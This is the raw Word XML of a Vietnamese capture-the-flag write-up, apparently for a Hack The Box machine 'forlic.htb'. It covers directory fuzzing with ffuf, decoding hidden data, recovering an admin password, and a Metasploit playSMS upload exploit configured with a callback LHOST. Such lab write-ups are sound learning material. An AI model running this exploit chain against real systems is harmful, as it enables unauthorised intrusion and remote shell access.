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F9F98" w14:textId="0E3E7AE7" w:rsidR="001168D9" w:rsidRPr="001168D9" w:rsidRDefault="001168D9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001168D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5402C" w14:textId="27D636C3" w:rsidR="002F49FE" w:rsidRDefault="00A76EE9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A76EE9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0342AA38" wp14:editId="5103696C">
            <wp:extent cx="5943600" cy="29025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DD43" w14:textId="77777777" w:rsidR="00A16ACE" w:rsidRDefault="00A16ACE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05339EDC" w14:textId="0DFDA50C" w:rsidR="0034378E" w:rsidRDefault="00A16AC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C1E754" wp14:editId="06E20210">
            <wp:extent cx="5943600" cy="1908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76E2" w14:textId="712AB0F8" w:rsidR="001168D9" w:rsidRDefault="001168D9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD40997" w14:textId="5C0A3109" w:rsidR="001168D9" w:rsidRDefault="00FA107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06F7C6" wp14:editId="4D09259D">
            <wp:extent cx="5943600" cy="26117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06B5" w14:textId="64F5F876" w:rsidR="00DA4AE1" w:rsidRDefault="00DA4AE1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D31F1B" w14:textId="30EAC8BA" w:rsidR="00A76EE9" w:rsidRPr="00DA4AE1" w:rsidRDefault="00DA4AE1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA4AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355880B6" w14:textId="045CB97B" w:rsidR="00912D86" w:rsidRDefault="0034378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6E827E" wp14:editId="620E91AB">
            <wp:extent cx="5943600" cy="33947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51D6" w14:textId="77777777" w:rsidR="001B45C8" w:rsidRDefault="001B45C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2689499C" w14:textId="5CBD819C" w:rsidR="00912D86" w:rsidRDefault="000D0A8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EAE5D7" wp14:editId="2757D1E3">
            <wp:extent cx="5943600" cy="822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36FA" w14:textId="447BD6A7" w:rsidR="006B5BB4" w:rsidRDefault="006B5BB4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE6AAF2" w14:textId="26B772A4" w:rsidR="00A20CDB" w:rsidRDefault="00A20CD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Thấy trang web ở cổng 9999 là trang mặc định của nginx, điều hướng đến forlic.htb:1880 nên mình tưởng chỉ có 1 trang web hoạt động ở cổng 1880. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5D3D2" w14:textId="77777777" w:rsidR="00A20CDB" w:rsidRPr="00A20CDB" w:rsidRDefault="00A20CDB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="363773F5" w14:textId="1AF2BE6E" w:rsidR="006B5BB4" w:rsidRPr="006B5BB4" w:rsidRDefault="00A20CD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Về sau mới biết c</w:t>
      </w:r>
      <w:r w:rsidR="006B5BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ó 2 máy chủ web đang hoạt động</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ở</w:t>
      </w:r>
      <w:r w:rsidR="006B5BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cổng 9999 và 1880</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78994886" w14:textId="6D804911" w:rsidR="004202F7" w:rsidRDefault="004202F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7FF979" w14:textId="60585775" w:rsidR="00A20CDB" w:rsidRDefault="00A20CD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bị mắc lỗi này khá nhiều lần, tưởng 1 lab chỉ có 1 trang web. Như vậy việc tìm kiếm lỗ hổng sẽ trở nên khó khăn hơn vì mình bị thiếu mất 1 phạm vi tấn công.</w:t>
      </w:r>
      <w:r w:rsidR="009B559F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đây là 1 thiếu xót cực kỳ lớn của mình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E4D02" w14:textId="77777777" w:rsidR="00A20CDB" w:rsidRPr="00A20CDB" w:rsidRDefault="00A20CDB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB1EC2F" w14:textId="04AC11E0" w:rsidR="006B5BB4" w:rsidRDefault="006B5BB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Tìm thư mục bị ẩn ở máy chủ web thứ 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605553C7" w14:textId="77777777" w:rsidR="00A20CDB" w:rsidRDefault="00A20CDB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58367599" w14:textId="491FB451" w:rsidR="006B5BB4" w:rsidRPr="00E31FBD" w:rsidRDefault="00A20CDB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31FBD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf -w ./wordlists/directory-list-1.0.txt -u http://forlic.htb:9999/FUZZ -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D091007" w14:textId="6FB8B209" w:rsidR="00462168" w:rsidRDefault="00462168">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B92E6C7" w14:textId="26AD034F" w:rsidR="00462168" w:rsidRDefault="0046216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Tìm được thư mục /dev, /test và /admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5664B242" w14:textId="1677E29A" w:rsidR="00462168" w:rsidRDefault="009B559F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B559F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://forlic.htb:9999/test/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103CDDD4" w14:textId="7FC48803" w:rsidR="009B559F" w:rsidRDefault="009B559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52EF8F9" wp14:editId="3B658200">
            <wp:extent cx="4130211" cy="2872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78" t="22681" r="12529"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4130399" cy="2872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2DD3E" w14:textId="23899F93" w:rsidR="00FD2CD1" w:rsidRDefault="00FD2CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BB9DCB" w14:textId="5659686B" w:rsidR="00FD2CD1" w:rsidRDefault="00FD2CD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Trang /dev bị lỗi 403, tiếp tục recon ở mức độ 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B7BACA" w14:textId="51602991" w:rsidR="00FD2CD1" w:rsidRDefault="00FD2CD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1277F95" wp14:editId="3D1D2E65">
            <wp:extent cx="5943600" cy="22447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9DA0" w14:textId="0D61BB80" w:rsidR="00B44F1D" w:rsidRPr="00BB7F1F" w:rsidRDefault="00B44F1D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7F1F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf -w ./wordlists/common.txt -u http://forlic.htb:9999/dev/FUZZ -c -e .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7962E474" w14:textId="61E336DE" w:rsidR="00B44F1D" w:rsidRDefault="00B44F1D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BCBEE2" w14:textId="09C109F1" w:rsidR="00B44F1D" w:rsidRDefault="00B44F1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Tìm được /backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA707F1" w14:textId="066D17B2" w:rsidR="00B44F1D" w:rsidRDefault="00BB7F1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CD70401" wp14:editId="2F1238D6">
            <wp:extent cx="5943600" cy="13944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AC88" w14:textId="3F068636" w:rsidR="00BD1303" w:rsidRDefault="00BD130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8578E72" wp14:editId="213D82BB">
            <wp:extent cx="5943600" cy="42583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3FED" w14:textId="77777777" w:rsidR="00B44F1D" w:rsidRDefault="00B44F1D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFD3132" w14:textId="77777777" w:rsidR="00B44F1D" w:rsidRDefault="00B44F1D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8972F3" w14:textId="57B5AEBB" w:rsidR="003921F9" w:rsidRDefault="00411B1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Trang /admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2099BA" w14:textId="3F427DD0" w:rsidR="00411B17" w:rsidRDefault="00411B1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F7E2276" wp14:editId="65CB5D54">
            <wp:extent cx="5880100" cy="6832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683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66C2" w14:textId="06300449" w:rsidR="000F44E1" w:rsidRDefault="000F44E1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2115E5" w14:textId="5A641F47" w:rsidR="000F44E1" w:rsidRDefault="000F44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Đừng quên quan sát hành vi của trang web bằng Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E10CA39" w14:textId="77777777" w:rsidR="000F44E1" w:rsidRDefault="000F44E1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE8373D" w14:textId="73806F0C" w:rsidR="00411B17" w:rsidRDefault="00765DD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thấy trang admin gọi đến tệp javascript khá nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD8F3AF" w14:textId="77777777" w:rsidR="00411B17" w:rsidRDefault="00411B17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3662C3BA" w14:textId="2131069D" w:rsidR="003921F9" w:rsidRDefault="00765DD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7D79206" wp14:editId="4028DD98">
            <wp:extent cx="3238500" cy="228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7432" w14:textId="6DD6DAD2" w:rsidR="00765DDD" w:rsidRDefault="00765DD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67B5017" wp14:editId="1FB6130C">
            <wp:extent cx="3530600" cy="571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9AFB" w14:textId="14677038" w:rsidR="00F34B2E" w:rsidRDefault="00F34B2E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3E0F5F" w14:textId="4C23F693" w:rsidR="00F34B2E" w:rsidRDefault="00F34B2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Đăng nhập thành công thì nó hiện 1 trang trống rỗng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC67B20" w14:textId="73E84CEF" w:rsidR="00F34B2E" w:rsidRDefault="00D135D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050CE2A" wp14:editId="2F5E34FF">
            <wp:extent cx="5238702" cy="1201178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7" t="22136" r="4214" b="45514"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5241030" cy="1201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C59B2" w14:textId="6D69D8A7" w:rsidR="00F648F0" w:rsidRDefault="00F648F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A97A74" w14:textId="71CB87CD" w:rsidR="00F648F0" w:rsidRDefault="00F648F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Ngôn ngữ lập trình sau khi xác thực là Ook!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A3C30" w14:textId="1A53D52E" w:rsidR="00034F32" w:rsidRDefault="00034F32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D261417" w14:textId="2F0B08B6" w:rsidR="00034F32" w:rsidRDefault="00034F3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Mình đưa vào trình thông duyệt Ook! thì nó trả về 1 đường dẫn </w:t>
      </w:r>
      <w:r w:rsidRPr="00034F32">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/asdiSIAJJ0QWE9JAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2825BB96" w14:textId="61842FCA" w:rsidR="00F648F0" w:rsidRDefault="00034F3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F1E7AE4" wp14:editId="06A0CA79">
            <wp:extent cx="5943600" cy="34207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626A" w14:textId="65898989" w:rsidR="00765DDD" w:rsidRDefault="00765DDD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686E44E1" w14:textId="338391AF" w:rsidR="00A25712" w:rsidRDefault="00A2571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Nó lại hiện 1 đoạn mã khác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D0537" w14:textId="138F5B00" w:rsidR="00765DDD" w:rsidRDefault="00A2571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93D5532" wp14:editId="057E9E3F">
            <wp:extent cx="5943600" cy="11385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9562" w14:textId="23B87DC6" w:rsidR="00CA2E6F" w:rsidRDefault="00CA2E6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Chuỗi ở trên có thể khôi phục 1 tập tin zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BDCE2C" w14:textId="479B657F" w:rsidR="004A436E" w:rsidRDefault="004A436E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F918830" w14:textId="0ADEA1BC" w:rsidR="004A436E" w:rsidRDefault="006D4A8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E6EF52C" wp14:editId="40DA1EDB">
            <wp:extent cx="5943600" cy="16548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6B89" w14:textId="10FD3021" w:rsidR="006D4A87" w:rsidRDefault="006D4A87">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2C0ECB" w14:textId="6A5E9D6F" w:rsidR="006D4A87" w:rsidRDefault="00A07F4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Dùng tool base64decode.org để giải mã, sau đó tải về file zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA8FF4" w14:textId="65A9CD8B" w:rsidR="00A07F43" w:rsidRDefault="002D6C9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612771B" wp14:editId="5F8AAA08">
            <wp:extent cx="5041900" cy="1409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4921" w14:textId="1CE54597" w:rsidR="002D6C91" w:rsidRDefault="002D6C91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2651AA0D" w14:textId="50CB143B" w:rsidR="00E5042E" w:rsidRDefault="00E5042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Nó yêu cầu mật khẩu để unzip file index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58795B56" w14:textId="19D3ED1C" w:rsidR="00E5042E" w:rsidRDefault="003449B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9FA5514" wp14:editId="655A35B4">
            <wp:extent cx="5943600" cy="7385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FE32" w14:textId="0293B8C2" w:rsidR="003449B0" w:rsidRDefault="003449B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78238FDD" w14:textId="2485BFF9" w:rsidR="003449B0" w:rsidRDefault="00C723B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BDF0019" wp14:editId="33D59A1B">
            <wp:extent cx="5943600" cy="17202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21C5" w14:textId="46021D13" w:rsidR="00C723B7" w:rsidRDefault="0032305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BF65942" wp14:editId="1351D918">
            <wp:extent cx="5943600" cy="24530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33F3" w14:textId="6D2FC725" w:rsidR="00323056" w:rsidRDefault="00323056">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF7B66C" w14:textId="79749896" w:rsidR="00323056" w:rsidRDefault="00D0446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5A3E83F" wp14:editId="7DFD4CB4">
            <wp:extent cx="4170680" cy="224916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64" t="17432" r="4734" b="21995"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4172499" cy="2250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EB4CC" w14:textId="143AA4CB" w:rsidR="00D04462" w:rsidRDefault="00D04462">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D0B971" w14:textId="588E05EF" w:rsidR="00D04462" w:rsidRDefault="00FC756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3CCD2D0" wp14:editId="1F31E795">
            <wp:extent cx="5943600" cy="25990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949D" w14:textId="55002F5D" w:rsidR="00FC7563" w:rsidRDefault="00FC7563">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0325E4F2" w14:textId="0ACD30EF" w:rsidR="00FC7563" w:rsidRDefault="00FC756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Tìm được mật khẩu của admin: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC7563">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>idkwhatispass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718AD1B" w14:textId="43D4F5FF" w:rsidR="00A07F43" w:rsidRDefault="00FC756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Giao diện playsms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734A9ECF" w14:textId="24056EEE" w:rsidR="00CA2E6F" w:rsidRDefault="00FC756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B328972" wp14:editId="5C6B6A16">
            <wp:extent cx="5943600" cy="22180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5355" w14:textId="72A1C144" w:rsidR="00E31FBD" w:rsidRDefault="00E31F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Khi xác thực thành công, bạn có thể khai thác bằng public exploit của playsms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280340E" w14:textId="4B59DBB8" w:rsidR="00E31FBD" w:rsidRDefault="00E31FBD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514F0B7E" w14:textId="22B87142" w:rsidR="00E31FBD" w:rsidRPr="006C0674" w:rsidRDefault="00A21167">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DDA2CE" w14:textId="256C2958" w:rsidR="00A21167" w:rsidRPr="006C0674" w:rsidRDefault="00A21167">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit/multi/http/playsms_uploadcsv_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417ADDB9" w14:textId="64DDD2F4" w:rsidR="00A21167" w:rsidRPr="006C0674" w:rsidRDefault="00A21167">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF2CAF6" w14:textId="3CFADB83" w:rsidR="00A21167" w:rsidRPr="006C0674" w:rsidRDefault="00A21167">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set password idkwhatispass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC40D1F" w14:textId="6E7DE689" w:rsidR="00A21167" w:rsidRPr="006C0674" w:rsidRDefault="00561AAC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set rport 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F021239" w14:textId="6F3E0C6C" w:rsidR="00561AAC" w:rsidRPr="006C0674" w:rsidRDefault="00561AAC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set rhosts forlic.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F7A5B" w14:textId="5C6162C5" w:rsidR="00561AAC" w:rsidRPr="006C0674" w:rsidRDefault="00561AAC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set targeturi playsms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6550FD" w14:textId="1F1703F9" w:rsidR="00561AAC" w:rsidRPr="006C0674" w:rsidRDefault="00561AAC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set lhost 10.10.16.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51002A38" w14:textId="648B4849" w:rsidR="00561AAC" w:rsidRPr="006C0674" w:rsidRDefault="00561AAC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0674">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E611606" w14:textId="77777777" w:rsidR="00561AAC" w:rsidRDefault="00561AAC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
